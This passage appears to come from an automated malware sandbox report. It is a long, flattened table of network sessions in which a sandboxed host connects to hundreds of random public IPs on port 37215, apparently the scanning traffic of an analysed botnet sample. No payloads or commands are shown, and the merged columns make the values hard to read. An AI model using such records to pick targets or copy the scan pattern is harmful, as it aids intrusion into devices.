                                                          7416192.168.2.1552260105.151.185.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7417192.168.2.1538622197.72.171.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7418192.168.2.1555570197.83.16.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7419192.168.2.155077241.222.174.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7420192.168.2.1558126157.53.250.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7421192.168.2.1548628197.153.52.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7422192.168.2.1558910157.220.230.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7423192.168.2.1555540157.47.228.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7424192.168.2.15590205.255.183.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7425192.168.2.1547180157.216.247.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7426192.168.2.1551008211.91.31.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7427192.168.2.153924041.182.95.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7428192.168.2.1546378197.17.22.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7429192.168.2.1560902106.69.242.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7430192.168.2.1560698157.236.0.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7431192.168.2.155532868.219.159.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7432192.168.2.1541894157.36.3.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7433192.168.2.1547344157.198.8.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7434192.168.2.1542550157.143.140.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7435192.168.2.153734841.195.223.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7436192.168.2.154335441.77.28.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7437192.168.2.1552058157.15.244.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7438192.168.2.1543314197.59.57.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7439192.168.2.153544290.143.204.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7440192.168.2.1552416157.42.254.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7441192.168.2.1544202157.53.85.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7442192.168.2.1548216157.119.116.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7443192.168.2.154175841.180.85.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7444192.168.2.1542292197.201.94.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7445192.168.2.1547456197.78.107.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7446192.168.2.1555216197.161.124.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7447192.168.2.154405841.84.250.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7448192.168.2.1541784197.200.144.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7449192.168.2.156012841.191.199.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7450192.168.2.1539336157.69.207.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7451192.168.2.1558384157.166.129.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7452192.168.2.153852841.158.119.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7453192.168.2.155728285.108.158.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7454192.168.2.154222041.68.209.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7455192.168.2.1541872157.63.180.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7456192.168.2.1535808197.209.6.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7457192.168.2.1545024160.187.242.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7458192.168.2.1558328197.78.88.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7459192.168.2.155445814.92.41.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7460192.168.2.1552402157.157.36.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7461192.168.2.154661841.29.159.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7462192.168.2.1538972157.155.16.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7463192.168.2.154222641.186.142.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7464192.168.2.1544634197.196.112.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7465192.168.2.156069443.110.251.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7466192.168.2.1558664197.110.18.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7467192.168.2.1559062197.166.42.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7468192.168.2.1554716219.254.19.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7469192.168.2.1537856157.116.238.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7470192.168.2.155189867.30.70.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7471192.168.2.155348841.18.182.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7472192.168.2.155447241.31.89.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7473192.168.2.155978641.246.178.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7474192.168.2.155289041.41.146.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7475192.168.2.154158441.207.2.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7476192.168.2.1546192197.127.223.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7477192.168.2.1559808112.77.231.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7478192.168.2.153435041.40.219.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7479192.168.2.1538220197.191.123.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7480192.168.2.153960841.241.23.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7481192.168.2.1555368157.81.253.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7482192.168.2.153644841.247.65.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7483192.168.2.1546094197.72.65.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7484192.168.2.153854241.220.252.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7485192.168.2.1560490145.43.3.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7486192.168.2.1533512197.84.77.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7487192.168.2.153543241.157.15.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7488192.168.2.1541492197.16.131.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7489192.168.2.155097247.20.228.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7490192.168.2.1540990157.250.192.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7491192.168.2.1540788197.70.118.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7492192.168.2.154217477.250.104.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7493192.168.2.1551706157.50.200.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7494192.168.2.153467641.185.36.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7495192.168.2.1539204197.131.176.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7496192.168.2.1555878154.252.144.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7497192.168.2.1556338197.249.38.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7498192.168.2.1559880197.238.94.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7499192.168.2.1538440157.225.179.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7500192.168.2.1553030182.11.95.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7501192.168.2.154197641.136.38.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7502192.168.2.1553956157.31.133.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7503192.168.2.1555890157.83.202.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7504192.168.2.1543770126.209.35.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7505192.168.2.1549006197.129.4.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7506192.168.2.1560904197.231.168.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7507192.168.2.1553648197.52.147.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7508192.168.2.1554316157.116.166.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7509192.168.2.1545558197.220.174.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7510192.168.2.154902699.73.155.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7511192.168.2.155790841.56.0.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7512192.168.2.1538516197.152.235.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7513192.168.2.1559566157.216.202.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7514192.168.2.1541372197.38.178.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7515192.168.2.1538826197.88.67.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7516192.168.2.155419041.97.205.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7517192.168.2.1541438119.37.206.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7518192.168.2.155285241.195.5.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7519192.168.2.1551170129.45.81.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7520192.168.2.1544956197.150.73.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7521192.168.2.1550096157.122.36.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7522192.168.2.155159441.180.149.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7523192.168.2.1545568157.85.205.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7524192.168.2.1540946157.172.219.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7525192.168.2.1536940197.87.224.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7526192.168.2.1546170157.2.36.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7527192.168.2.154020641.172.12.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7528192.168.2.1533214197.111.232.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7529192.168.2.1558670114.44.114.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7530192.168.2.1556470157.243.33.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7531192.168.2.154305441.11.107.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7532192.168.2.153453841.157.11.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7533192.168.2.1549288157.85.100.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7534192.168.2.1551370177.210.175.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7535192.168.2.1535646102.66.128.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7536192.168.2.1539184211.7.193.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7537192.168.2.155035241.21.252.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7538192.168.2.155406620.169.225.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7539192.168.2.154814688.85.55.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7540192.168.2.1555546197.189.229.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7541192.168.2.1536698157.21.48.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7542192.168.2.1536382157.113.191.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7543192.168.2.1537820197.29.188.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7544192.168.2.155243441.36.139.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7545192.168.2.154542485.219.193.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7546192.168.2.1549168197.183.195.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7547192.168.2.1537678157.202.63.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7548192.168.2.1549566197.117.148.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7549192.168.2.1556598186.25.195.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7550192.168.2.1535910157.154.189.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7551192.168.2.1546610197.96.193.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7552192.168.2.1536000197.173.198.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7553192.168.2.153998841.33.176.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7554192.168.2.1555296197.8.250.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7555192.168.2.1550338204.12.191.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7556192.168.2.153981041.137.241.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7557192.168.2.1549024157.175.217.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7558192.168.2.1551352197.20.176.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7559192.168.2.1549170197.35.44.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7560192.168.2.1539066157.248.130.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7561192.168.2.1544592157.219.237.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7562192.168.2.1559802157.31.23.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7563192.168.2.1534784157.128.202.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7564192.168.2.1532970157.112.109.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7565192.168.2.1552680197.105.103.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7566192.168.2.1558712197.250.58.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7567192.168.2.154636041.110.48.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7568192.168.2.1534116157.44.17.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7569192.168.2.154843041.112.192.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7570192.168.2.1554432157.27.158.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7571192.168.2.154630861.120.165.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7572192.168.2.154203441.117.217.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7573192.168.2.1536116197.105.118.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7574192.168.2.155914441.180.91.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7575192.168.2.1558868197.186.224.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7576192.168.2.153467657.207.154.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7577192.168.2.154994641.243.190.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7578192.168.2.1545612197.202.194.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7579192.168.2.154724241.29.250.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7580192.168.2.156064441.44.163.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7581192.168.2.1536490197.191.10.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7582192.168.2.1537696151.134.147.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7583192.168.2.1540700157.147.214.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7584192.168.2.153985853.232.128.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7585192.168.2.154846641.2.79.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7586192.168.2.155261841.204.147.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7587192.168.2.1538042197.238.105.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7588192.168.2.154849241.84.9.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7589192.168.2.153407849.23.56.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7590192.168.2.1547916157.217.197.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7591192.168.2.154597841.152.104.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7592192.168.2.154663641.73.195.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7593192.168.2.154280861.86.204.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7594192.168.2.1537812197.52.169.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7595192.168.2.1558954197.182.53.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7596192.168.2.1551598197.32.187.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7597192.168.2.1559036197.234.69.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7598192.168.2.1548554157.244.77.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7599192.168.2.155261241.198.147.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7600192.168.2.1554414205.24.182.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7601192.168.2.1539962197.62.196.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7602192.168.2.1547610151.250.108.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7603192.168.2.154000637.224.93.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7604192.168.2.1560342157.133.240.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7605192.168.2.154577841.201.153.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7606192.168.2.1540098130.0.39.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7607192.168.2.1558020157.85.129.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7608192.168.2.1537268197.106.62.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7609192.168.2.1554236197.148.237.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7610192.168.2.155698641.94.195.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7611192.168.2.1542794157.131.215.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7612192.168.2.1559094197.45.143.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7613192.168.2.1541772197.101.242.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7614192.168.2.155215441.104.210.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7615192.168.2.1534292157.28.88.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7616192.168.2.155536041.16.10.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7617192.168.2.1546566171.245.247.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7618192.168.2.155608641.141.66.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7619192.168.2.1543438197.29.166.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7620192.168.2.153384241.42.60.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7621192.168.2.155195841.7.187.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7622192.168.2.1554336185.183.248.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7623192.168.2.1547000157.37.1.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7624192.168.2.1550026157.105.30.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          7625192.168.2.1557604197.57.126.19137215
